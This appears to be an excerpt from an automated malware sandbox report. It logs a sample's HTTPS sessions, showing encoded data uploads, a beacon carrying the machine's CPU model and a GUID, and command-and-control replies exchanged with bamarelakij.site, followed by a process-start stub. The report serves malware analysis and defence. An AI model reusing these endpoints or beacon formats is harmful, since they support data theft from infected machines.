                                                                                                                                                            2025-01-06 22:05:19 UTC15331OUTData Raw: 2a e6 d3 a7 a8 c0 e7 9f 72 7d 49 28 0e 3b a5 24 e2 3c f7 e2 c4 ee 75 4f 98 c2 bf cf 76 56 44 1a 1b 32 c9 81 37 30 c6 97 0b 3d 17 60 9e fb d3 39 fb 9f 87 8e f1 47 35 dd 39 14 60 0f 3b b6 c3 7c 1c 70 a6 3c 3f b5 1a 10 d5 fa f5 bd 7a 94 52 fe 3d ab b2 68 28 41 68 56 8f a6 73 7e 30 7d 0b e1 dd a6 c3 3e 82 ca 6f 69 b7 ab 6b 7b 96 42 58 06 f4 65 d2 b3 a2 32 0c 14 b2 76 03 85 4e 91 5f 79 75 0e 52 f8 30 fb f9 04 f0 92 59 1f 74 3e b0 99 df d0 11 83 36 bc 14 75 36 ca fd 21 05 d7 25 98 97 c3 84 22 ed aa a0 8b 36 bb 72 9e 5d b3 e3 60 d4 85 3e b9 0b 44 00 fc ef 01 fa a2 7d 92 da 41 aa e2 98 8c e9 69 ff 2b 68 ff 99 ae 0c 20 fb 7f f4 ce 38 c8 7f b4 88 05 7b fd d4 e5 ff 93 b3 f8 dd 0e 8e 6b ef 7a 77 21 b6 7f f5 58 9c 92 9c 6c 90 3d 23 2b 95 e7 dc a9 a0 5d 2f d6 11 91 6e
                                                                                                                                                            Data Ascii: *r}I(;$<uOvVD270=`9G59`;|p<?zR=h(AhVs~0}>oik{BXe2vN_yuR0Yt>6u6!%"6r]`>D}Ai+h 8{kzw!Xl=#+]/n
                                                                                                                                                            2025-01-06 22:05:19 UTC15331OUTData Raw: 74 f8 ba 11 bc 5e a7 3c c1 97 73 55 d2 70 11 ba 7d 99 ce 7d f3 51 e7 89 35 5a 5a 9e 16 14 9d 1e fa 29 ac 2d 22 d1 52 c2 2c 4f c3 25 96 6c 05 46 e0 8b f1 b7 b8 57 55 1a b2 90 73 2b 0e a5 2a d2 76 d4 2a 6a 7f 28 69 b1 fe f9 0c 08 09 d4 3d a4 36 7f b7 24 34 de 39 05 ff a6 81 ff f2 76 7b e7 bd 9c 3f cc 33 7e 3a 66 7f f2 ee d6 e4 88 48 63 31 27 0b 19 ed b2 7f 3e 68 f8 d9 d2 a4 e4 3c 37 b2 74 0f aa 2a fb ed bb 7b a9 26 5f 7b 89 5e b0 af ad b2 ab ab aa b1 a1 79 d0 ee 97 f9 91 41 cc f1 3a 38 c7 e9 03 ad 1d 72 ec 42 44 01 ad 14 d0 3f 3b d5 4d da d6 66 3e 92 4a ec a5 45 d8 3d ae 0f 68 46 ec e4 87 36 ca 4a 4c 69 8f 9c a2 2c 0f 14 28 17 49 8c 79 cf 7b df 9a 87 f5 03 b7 a1 9b ba f5 8b 16 3c da 3b 84 02 88 b7 c1 d6 cc b6 26 5e f0 b6 cf 08 1e a9 70 8a ba e4 1a be 7d 22
                                                                                                                                                            Data Ascii: t^<sUp}}Q5ZZ)-"R,O%lFWUs+*v*j(i=6$49v{?3~:fHc1'>h<7t*{&_{^yA:8rBD?;Mf>JE=hF6JLi,(Iy{<;&^p}"
                                                                                                                                                            2025-01-06 22:05:19 UTC15331OUTData Raw: 96 53 d6 4c 87 16 55 9f c4 b4 ca b6 f6 e1 62 c6 62 bc de 48 3d f2 b1 26 99 03 32 71 01 05 74 8c fa 09 39 b2 2e 4b 01 2a 43 46 ce 90 f7 59 c6 21 cd cb a4 cc df 6c 71 ed a8 88 eb 7b d9 b7 1e ba 94 26 48 b6 ce eb 3b 8e 41 6f b2 be d1 6d e7 8a 7b 45 68 9a 2c 64 6a 54 92 75 03 fe 32 4e 0b a8 db a0 26 a4 40 c6 91 1a 19 ce e1 fb 46 2f 64 36 34 cc 4f 56 f1 a9 7b eb e8 66 04 12 a4 e9 e1 c9 63 3b ee b9 1a 9a 5a 86 09 25 b9 a1 7a 4f b3 c0 42 09 96 79 89 9b 4f 3a 73 f5 ab 5e 0f 8d c8 e2 dd 2f b8 b7 c4 e2 43 f5 e8 e6 b8 fa c7 4e e0 31 66 60 66 bd 0e 9c 5c 83 9e 91 3d 22 d2 6c 5b f6 2d ee c2 5c da 0d 32 b9 5c 34 ea 0c a3 be e0 c8 2b e0 77 ce 7a 30 63 83 2c e6 55 5c 12 76 e2 ba 01 25 57 04 59 eb ca d4 8e 08 68 8e 3d 5c 8c fb ce 1a 1b b8 61 1a 2d ba 0e 24 be 9f 58 e9 af
                                                                                                                                                            Data Ascii: SLUbbH=&2qt9.K*CFY!lq{&H;Aom{Eh,djTu2N&@F/d64OV{fc;Z%zOByO:s^/CN1f`f\="l[-\2\4+wz0c,U\v%WYh=\a-$X
                                                                                                                                                            2025-01-06 22:05:19 UTC8416OUTData Raw: dd d2 7d 78 2f 15 62 86 c6 69 2d a4 a8 75 37 d2 1b 0d 50 ab 91 25 61 39 cb a3 be 89 25 99 58 43 87 bc ca 95 52 93 81 82 85 b3 ba 09 a4 35 28 00 bb a1 d6 09 76 89 76 a9 65 94 fe 6a 5f ad f2 17 f3 4c f1 23 f6 4c f4 c8 68 71 b8 61 ee ee 71 f9 58 f9 14 47 e8 a1 2c 77 22 a5 26 61 2c dc fe e0 42 3d 3f c0 3f 6a 4d e5 c0 b4 25 60 93 5a 00 63 12 41 0c ca 96 fe 7f ad c3 fb 23 66 2e ec 13 25 36 9f a4 ec 4e 8b cc 28 e1 de 21 85 a5 5f a2 da 3f fe 5d 06 97 3a 4c 1f 31 ee 64 e7 97 14 ba dd db 99 6e f4 60 7a 65 3a a8 1b a6 41 a4 6b 94 9a 45 8a d4 f1 1a ed a4 a0 b0 9b 3e 4a b8 6d 66 a3 e2 18 48 c4 38 bf 79 55 2f db 96 b0 2c 33 73 e6 fa 83 29 b6 87 9c 09 3c c1 15 33 e8 c4 26 72 db d2 95 a9 ce ef 94 2a 5e a9 94 75 97 9a 9e 89 39 46 a8 8d eb bd fb 8e e1 3b 3e 0e c9 c1 11 5f
                                                                                                                                                            Data Ascii: }x/bi-u7P%a9%XCR5(vvej_L#LhqaqXG,w"&a,B=??jM%`ZcA#f.%6N(!_?]:L1dn`ze:AkE>JmfH8yU/,3s)<3&r*^u9F;>_
                                                                                                                                                            2025-01-06 22:05:19 UTC826INHTTP/1.1 204 No Content
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:19 GMT
                                                                                                                                                            Connection: close
                                                                                                                                                            v: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zrUR1In0x9fqwPnhAXjXoPCY0kOk%2BWPy6hqBT9xXoyu1Xx3pOSXLUet8z17vMQApWjxlnVzhCyFvNzB9Os8LOeyW44j%2BDfrMQXUmguKhyxINHWxoo17Qfb3SuWHk79PdGy57"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fdf0244998bc43b-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1652&rtt_var=645&sent=48&recv=77&lost=0&retrans=0&sent_bytes=2838&recv_bytes=71032&delivery_rate=1662870&cwnd=194&unsent_bytes=0&cid=87ca1a93db91951e&ts=635&x=0"


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            23192.168.2.449954104.21.80.524435580C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:19 UTC352OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept: */*
                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                            Content-Length: 147
                                                                                                                                                            Host: bamarelakij.site
                                                                                                                                                            2025-01-06 22:05:19 UTC147OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 00 60 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 88 dc 82 cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                            Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzd$9e146be9-c76a-4720-bcdb-53011b87bd06
                                                                                                                                                            2025-01-06 22:05:19 UTC847INHTTP/1.1 200 OK
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:19 GMT
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            v: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ebbQMZj%2FzZx9wXsjwNwLDGEmMzJ5gnGmBCfUYL0D%2FpEtkqEyN%2FvFoJyoChQkk5zQR2Vum3OEc7yPDl7dY9gCSPBxTXJimejEtTRusKQqwQcZH0N%2BC6MU1L7lKoSJYdlKMHa"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fdf02459c01f795-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1634&rtt_var=633&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1135&delivery_rate=1701631&cwnd=187&unsent_bytes=0&cid=aeb1c83b84f369c4&ts=405&x=0"
                                                                                                                                                            2025-01-06 22:05:19 UTC522INData Raw: 33 32 66 32 0d 0a f2 82 00 00 00 00 00 00 00 00 00 00 e0 c7 0b 36 0e 00 7f 0e 86 0b 13 00 ec 0e 16 11 02 ec 08 7a 59 86 0b 65 9b b6 a7 b7 51 c9 59 b3 b2 b1 b5 b7 af 31 39 b7 bb b9 b2 39 b9 20 00 96 09 05 0f 13 00 ec 0e 16 11 02 ec 08 3e 59 05 0f 65 9b b6 a7 b7 51 c9 59 a9 a7 23 2a ab a0 29 a2 2e ab a7 ab 1b 1a 99 19 27 b7 32 b2 2e 2b b0 36 3b b2 2e a9 3a b2 b0 b6 04 00 ac 09 ce 02 0f 00 e4 0e 16 11 02 e4 04 34 59 ce 02 bc 58 d8 c3 49 7d 17 f0 0b 00 42 01 a9 05 13 00 ec 0e 16 11 02 ec 08 34 59 a9 05 65 9b b6 a7 b7 51 c9 59 28 39 b2 33 b2 39 b2 37 b1 b2 b9 04 00 c6 03 32 0c 0f 00 e4 0e 16 11 02 e4 04 72 59 32 0c 65 fc e2 b9 9f d9 2d 8a 04 00 24 09 7a 0d 0f 00 e4 0e 16 11 02 e4 04 76 59 7a 0d f9 87 f9 1f 08 a2 36 2c 20 00 da 0c 94 00 13 00 ec 0e 16 11 02 ec
                                                                                                                                                            Data Ascii: 32f26zYeQY199 >YeQY#*).'2.+6;.:4YXI}B4YeQY(93972rY2e-$zvYz6,
                                                                                                                                                            2025-01-06 22:05:19 UTC1369INData Raw: 00 bf 03 4b 04 13 00 ec 0e 16 11 02 ec 08 7a 59 4b 04 65 9b b6 a7 b7 51 c9 59 b3 b2 b1 b5 b7 af 31 39 b7 bb b9 b2 39 b9 0a 00 1a 02 7b 0c 13 00 ec 0e 16 11 02 ec 08 76 59 7b 0c 65 9b b6 a7 b7 51 c9 59 b6 b9 b2 32 b3 b2 17 b2 3c b2 08 00 8c 06 43 09 13 00 eb 0e 16 11 02 eb 08 34 59 43 09 47 ac ad f0 3d 2b 6a cc b2 32 32 97 01 18 2c 3f 04 00 a5 0a a1 0c 0f 00 e4 0e 16 11 02 e4 04 34 59 a1 0c a0 8a c3 bc 51 af 0c 8f 0e 00 92 02 cd 09 13 00 ec 0e 16 11 02 ec 08 7a 59 cd 09 65 9b b6 a7 b7 51 c9 59 b3 b2 b1 b5 b7 af 31 39 b7 bb b9 b2 39 b9 16 00 89 02 22 06 13 00 ec 0e 16 11 02 ec 08 73 59 22 06 65 9b b6 a7 b7 51 c9 59 2a b2 36 b2 b3 39 b0 b6 10 22 b2 b9 b5 3a b7 38 2e 3a 32 b0 3a b0 08 00 e1 03 08 0a 13 00 eb 0e 16 11 02 eb 08 d8 59 08 0a 01 28 f6 ed 70 e9 f5
                                                                                                                                                            Data Ascii: KzYKeQY199{vY{eQY2<C4YCG=+j22,?4YQzYeQY199"sY"eQY*69":8.:2:Y(p
                                                                                                                                                            2025-01-06 22:05:19 UTC1369INData Raw: 08 d8 59 79 0a 65 9b b6 a7 b7 51 c9 59 aa b9 b2 39 96 a0 b3 b2 37 3a 06 00 83 0e a5 06 13 00 ec 0e 16 11 02 ec 08 72 59 a5 06 65 9b b6 a7 b7 51 c9 59 a0 39 b6 b7 39 bc 0b 00 e9 07 7c 08 13 00 ec 0e 16 11 02 ec 08 76 59 7c 08 65 9b b6 a7 b7 51 c9 59 26 b7 b1 b0 36 10 a9 3a b0 3a b2 07 00 22 0c 52 01 13 00 ec 0e 16 11 02 ec 08 76 59 52 01 65 9b b6 a7 b7 51 c9 59 a1 aa 29 29 a2 27 2a 16 00 c6 07 38 07 13 00 ec 0e 16 11 02 ec 08 9a 59 38 07 65 9b b6 a7 b7 51 c9 59 3b 37 b1 2e 2a b4 b3 34 3a 2b 27 a1 2e 32 b0 3a b0 17 35 b9 b7 37 04 00 2a 06 04 05 0f 00 e4 0e 16 11 02 e4 04 72 59 04 05 5f 60 67 d8 af 45 a8 eb 08 00 c7 02 33 0f 13 00 ec 0e 16 11 02 ec 08 d8 59 33 0f 65 9b b6 a7 b7 51 c9 59 b2 32 b3 b2 17 b2 3c b2 07 00 cc 0e a3 08 13 00 ec 0e 16 11 02 ec 08 76
                                                                                                                                                            Data Ascii: YyeQY97:rYeQY99|vY|eQY&6::"RvYReQY))'*8Y8eQY;7.*4:+'.2:57*rY_`gE3Y3eQY2<v
                                                                                                                                                            2025-01-06 22:05:19 UTC1369INData Raw: 51 c9 59 ba b9 b2 39 3a b0 b3 08 00 e9 01 f9 0d 13 00 eb 0e 16 11 02 eb 08 9a 59 f9 0d 30 5c 2f b5 da 53 52 ec c1 c2 b0 d2 e6 60 14 1f 0a 00 51 03 3c 08 13 00 ec 0e 16 11 02 ec 08 72 59 3c 08 65 9b b6 a7 b7 51 c9 59 b9 3a 39 22 b0 3a b0 22 b4 39 07 00 63 06 8e 0a 13 00 ec 0e 16 11 02 ec 08 9a 59 8e 0a 65 9b b6 a7 b7 51 c9 59 29 b2 b0 36 2b 27 a1 01 00 90 06 86 0d 13 00 ec 0e 16 11 02 ec 08 72 59 86 0d 65 9b b6 a7 b7 51 c9 59 15 07 00 19 0a 41 00 13 00 ec 0e 16 11 02 ec 08 76 59 41 00 65 9b b6 a7 b7 51 c9 59 a1 aa 29 29 a2 27 2a 15 00 73 0a 4a 03 13 00 ec 0e 16 11 02 ec 08 9a 59 4a 03 65 9b b6 a7 b7 51 c9 59 3b 37 b1 2e 29 b2 b0 36 2b 27 a1 2e 32 b0 3a b0 17 35 b9 b7 37 04 00 a3 0b 90 08 0f 00 e4 0e 16 11 02 e4 04 61 59 90 08 1b e9 48 a8 eb c8 87 9b 04 00
                                                                                                                                                            Data Ascii: QY9:Y0\/SR`Q<rY<eQY:9":"9cYeQY)6+'rYeQYAvYAeQY))'*sJYJeQY;7.)6+'.2:57aYH
                                                                                                                                                            2025-01-06 22:05:19 UTC1369INData Raw: b4 b2 bb b2 39 17 32 2e 38 b0 b9 b9 bb b7 39 32 b9 17 32 b2 b1 39 bc 38 3a b2 32 96 b6 b0 b9 3a b2 39 04 00 41 0c cc 04 0f 00 e4 0e 16 11 02 e4 04 d8 59 cc 04 ec 5f 04 4b 73 a8 62 60 07 00 36 00 3f 0f 13 00 ec 0e 16 11 02 ec 08 9a 59 3f 0f 65 9b b6 a7 b7 51 c9 59 38 39 b4 3b b0 3a b2 07 00 96 06 c8 0a 13 00 ec 0e 16 11 02 ec 08 ed 59 c8 0a 65 9b b6 a7 b7 51 c9 59 a0 37 bc 22 b2 b9 b5 04 00 21 09 76 0c 0f 00 e4 0e 16 11 02 e4 04 34 59 76 0c fb 52 3e bf 0a 77 f1 8c 08 00 71 02 11 0c 13 00 ec 0e 16 11 02 ec 08 72 59 11 0c 65 9b b6 a7 b7 51 c9 59 31 36 b5 32 b0 3a b0 15 04 00 61 0a a5 01 0f 00 e4 0e 16 11 02 e4 04 76 59 a5 01 d6 2e 11 d5 27 0b de e6 04 00 92 05 0d 06 0f 00 e4 0e 16 11 02 e4 04 73 59 0d 06 cd 2c 10 df 3d 0d df ec 08 00 09 08 5a 01 13 00 ec 0e
                                                                                                                                                            Data Ascii: 92.892298:2:9AY_Ksb`6?Y?eQY89;:YeQY7"!v4YvR>wqrYeQY162:avY.'sY,=Z
                                                                                                                                                            2025-01-06 22:05:19 UTC1369INData Raw: b6 a7 b7 51 c9 59 38 39 b7 33 b4 36 b2 b9 09 00 cf 0d 67 01 13 00 ec 0e 16 11 02 ec 08 76 59 67 01 65 9b b6 a7 b7 51 c9 59 a6 a0 27 a4 23 a2 a9 2a 15 10 00 22 07 b5 0d 13 00 ec 0e 16 11 02 ec 08 9a 59 b5 0d 65 9b b6 a7 b7 51 c9 59 a9 a7 23 2a ab a0 29 a2 2e 29 b2 b0 36 2b 27 a1 15 00 73 09 7f 0c 13 00 ec 0e 16 11 02 ec 08 73 59 7f 0c 65 9b b6 a7 b7 51 c9 59 b9 34 b7 39 3a b1 ba 3a b9 96 b1 ba b9 3a b7 b6 17 35 b9 b7 37 08 00 42 05 b3 0a 13 00 eb 0e 16 11 02 eb 08 76 59 b3 0a 96 c5 39 09 d9 75 16 03 65 5b a6 6e e5 46 50 f0 08 00 2f 0f f2 02 13 00 ec 0e 16 11 02 ec 08 76 59 f2 02 65 9b b6 a7 b7 51 c9 59 ab b2 31 10 22 b0 3a b0 08 00 96 08 2b 0d 13 00 eb 0e 16 11 02 eb 08 76 59 2b 0d 97 12 79 3e 92 e2 44 fc 66 8c e6 59 ae d1 02 0f 04 00 d0 02 48 05 0f 00 e4
                                                                                                                                                            Data Ascii: QY8936gvYgeQY'#*"YeQY#*).)6+'ssYeQY49:::57BvY9ue[nFP/vYeQY1":+vY+y>DfYH
                                                                                                                                                            2025-01-06 22:05:19 UTC1369INData Raw: 4e 66 ba ee 81 55 24 00 b5 04 e3 0e 13 00 ec 0e 16 11 02 ec 08 76 59 e3 0e 65 9b b6 a7 b7 51 c9 59 a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e a0 38 38 36 b4 b1 b0 3a b4 b7 37 2e b1 34 39 b7 b6 b2 17 b2 3c b2 04 00 35 0d 51 0e 0f 00 e4 0e 16 11 02 e4 04 34 59 51 0e f4 c9 71 76 05 ec be 45 08 00 cf 0c dc 04 13 00 ec 0e 16 11 02 ec 08 72 59 dc 04 65 9b b6 a7 b7 51 c9 59 a2 36 b2 b1 3a 39 ba b6 04 00 8a 07 5d 09 0f 00 e4 0e 16 11 02 e4 04 d8 59 5d 09 c1 f9 e3 82 87 36 6d a2 04 00 ec 0c cc 0a 0f 00 e4 0e 16 11 02 e4 04 34 59 cc 0a 9f 6a 11 53 6e 4f de 60 04 00 74 0d 84 0f 0f 00 e4 0e 16 11 02 e4 04 d8 59 84 0f 86 61 e0 37 b5 55 3b 26 12 00 57 0f 1c 0b 13 00 ec 0e 16 11 02 ec 08 9a 59 1c 0b 65 9b b6 a7 b7 51 c9 59 21 b7 b7 3a b9 3a 39 b0 38 a1 b0 b1 34 b2 17 38
                                                                                                                                                            Data Ascii: NfU$vYeQY6.49.886:7.49<5Q4YQqvErYeQY6:9]Y]6m4YjSnO`tYa7U;&WYeQY!::9848
                                                                                                                                                            2025-01-06 22:05:19 UTC1369INData Raw: 51 c9 59 bb b0 36 36 b2 3a b9 2e a2 36 b2 b1 3a 39 ba b6 04 00 55 0e 4a 0e 0f 00 e4 0e 16 11 02 e4 04 34 59 4a 0e 6d 48 cd 1f 9c 6d 02 2c 08 00 98 05 7c 05 13 00 ec 0e 16 11 02 ec 08 76 59 7c 05 65 9b b6 a7 b7 51 c9 59 38 39 b7 33 b4 36 b2 b9 08 00 1d 05 73 06 13 00 ec 0e 16 11 02 ec 08 9a 59 73 06 65 9b b6 a7 b7 51 c9 59 32 b2 3b b4 b1 b2 a4 32 08 00 01 07 7e 0a 13 00 eb 0e 16 11 02 eb 08 76 59 7e 0a 44 4e b0 2a 09 b2 fd 29 b5 d0 2f 4d 35 81 bb da 08 00 a3 05 96 0c 13 00 ec 0e 16 11 02 ec 08 76 59 96 0c 65 9b b6 a7 b7 51 c9 59 38 39 b7 33 b4 36 b2 b9 08 00 61 07 10 01 13 00 ec 0e 16 11 02 ec 08 7a 59 10 01 65 9b b6 a7 b7 51 c9 59 28 39 b7 33 b4 36 b2 b9 04 00 16 0d f4 02 0f 00 e4 0e 16 11 02 e4 04 72 59 f4 02 a2 40 03 57 53 65 cc 64 0a 00 0d 03 9c 0c 13
                                                                                                                                                            Data Ascii: QY66:.6:9UJ4YJmHm,|vY|eQY8936sYseQY2;2~vY~DN*)/M5vYeQY8936azYeQY(936rY@WSed
                                                                                                                                                            2025-01-06 22:05:19 UTC1369INData Raw: 2e a6 b4 b1 39 b7 b9 b7 33 3a 2e a2 32 b3 b2 2e a0 38 38 36 b4 b1 b0 3a b4 b7 37 2e b6 b9 b2 32 b3 b2 17 b2 3c b2 04 00 65 0f 15 05 0f 00 e4 0e 16 11 02 e4 04 76 59 15 05 0d 83 3d 7e fc a6 f2 4d 04 00 f0 0e 3a 08 0f 00 e4 0e 16 11 02 e4 04 ed 59 3a 08 b8 b0 eb e2 49 95 24 d1 04 00 c4 0b b0 0e 0f 00 e4 0e 16 11 02 e4 04 72 59 b0 0e 45 22 23 14 b5 e6 19 22 0b 00 3f 02 6f 09 13 00 ec 0e 16 11 02 ec 08 d8 59 6f 09 65 9b b6 a7 b7 51 c9 59 31 39 b7 bb b9 b2 39 17 b2 3c b2 04 00 bd 01 51 09 0f 00 e4 0e 16 11 02 e4 04 72 59 51 09 89 54 7b 8b 79 90 41 bd 20 00 b6 06 b9 05 13 00 ec 0e 16 11 02 ec 08 73 59 b9 05 65 9b b6 a7 b7 51 c9 59 32 b4 b9 b1 b7 39 32 38 3a 31 2e 26 b7 b1 b0 36 10 a9 3a b7 39 b0 b3 b2 2e 36 b2 3b b2 36 32 31 08 00 86 0e 4c 02 13 00 eb 0e 16 11
                                                                                                                                                            Data Ascii: .93:.2.886:7.2<evY=~M:Y:I$rYE"#"?oYoeQY199<QrYQT{yA sYeQY2928:1.&6:9.6;621L


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            24192.168.2.449960104.21.80.524434176C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:20 UTC455OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept: */*
                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                            fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                                                                                                                            Content-Length: 35
                                                                                                                                                            Host: bamarelakij.site
                                                                                                                                                            2025-01-06 22:05:20 UTC35OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                            Data Ascii:
                                                                                                                                                            2025-01-06 22:05:20 UTC728INHTTP/1.1 204 No Content
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:20 GMT
                                                                                                                                                            Connection: close
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pDESY6bAzCi%2FHjc3mdOm2FozfQM3sUMS4JVXv2NHtIJf1ucO0dzt0lKKNtpelU3GOyNf9QvvgkEmh3%2BUP79m59rOluhdffUGCihM%2B5j9bjyRH7txY6xXwbmKX%2Fss4IbfepTr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fdf024b79d842d3-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1606&rtt_var=613&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1126&delivery_rate=1769696&cwnd=246&unsent_bytes=0&cid=65b631acdc809da4&ts=301&x=0"


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            25192.168.2.449966104.21.80.524435580C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:20 UTC455OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept: */*
                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                            fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                                                                                                                            Content-Length: 53
                                                                                                                                                            Host: bamarelakij.site
                                                                                                                                                            2025-01-06 22:05:20 UTC53OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 03 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                            Data Ascii:
                                                                                                                                                            2025-01-06 22:05:21 UTC724INHTTP/1.1 204 No Content
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:20 GMT
                                                                                                                                                            Connection: close
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=saHFWZv913nhrbEviC65qo6ORSIYg7K5pg6QHHxzWszAJ0euOIPJE0FXVAYLLnxn%2F487GoJfFrbaOwZM4dHcVtOdCL44hANbHMlwVjZbOHgJEt4Jt7AGejyHfuGZybKwl4Y%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fdf024cdcc441c0-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1765&rtt_var=666&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1144&delivery_rate=1654390&cwnd=210&unsent_bytes=0&cid=b711eac5c73a7d6c&ts=340&x=0"


                                                                                                                                                            Statistics

                                                                                                                                                            CPU Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Memory Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                            Behavior

                                                                                                                                                            Click to jump to process

                                                                                                                                                            System Behavior

                                                                                                                                                            General

                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:17:03:58
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Users\user\Desktop\w3245.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\w3245.exe"
